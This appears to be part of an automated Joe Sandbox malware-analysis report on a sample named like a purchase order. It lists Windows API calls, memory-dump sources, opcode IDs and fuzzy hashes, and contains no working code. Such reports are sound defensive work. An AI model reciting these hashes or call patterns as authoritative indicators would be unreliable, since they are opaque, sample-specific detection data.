                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                • Instruction ID: 7f9197a1b1888ebfd6de04269447b21ffcaf0972564048b2e7bc6ee4a29003df
                                                • Opcode Fuzzy Hash: 2074296acf118ace0f9b9ab2ab8615e2fe297c7dd6636d95e153eafbd2080ce7
                                                • Instruction Fuzzy Hash: 29E06D71E04104AAD710EBA5AE098AEB768DB84318B24407FF201B50D1CA7949119E2D
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                                • Instruction ID: 76b1046b3576aa71ae923c826af07df126468053c341a8b382c9c50c66927564
                                                • Opcode Fuzzy Hash: c0811cb59a621ebc69ef1af7074a37ada7c896faeab5dbfa84eb6157ad43e3d3
                                                • Instruction Fuzzy Hash: EFE0DF72700100EAE710DFA4DE48EAA33A8DF40368B30813AF611B60C0E6B4A9419B2D
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                APIs
                                                • VirtualProtect.KERNELBASE(6E42505C,00000004,00000040,6E42504C), ref: 6E4229B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: c259ba6175f349b76f459fe76c5e2fb96249f4acda2ffb88ef4091423c2569ce
                                                • Instruction ID: c5cf4afa4c296e7fe1590cbc67e229411e7002c17ecbd2b701f55bb7d2f2a53b
                                                • Opcode Fuzzy Hash: c259ba6175f349b76f459fe76c5e2fb96249f4acda2ffb88ef4091423c2569ce
                                                • Instruction Fuzzy Hash: E7F0A5B0514A80DECB90EF78AE44B093FE0B70B394B10452AE148DE249E33C4444CB9B
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: PrivateProfileString
                                                • String ID:
                                                • API String ID: 1096422788-0
                                                • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Call,?), ref: 0040614B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
                                                • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                • Opcode Fuzzy Hash: 64ed6ed63553c3debb963e99cdceae8c5f2f4ed38a401ee0c6b4ad6bb8aa7b6c
                                                • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                APIs
                                                • SendMessageW.USER32(00010446,00000000,00000000,00000000), ref: 0040428F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                • Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
                                                • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                • Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                APIs
                                                • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
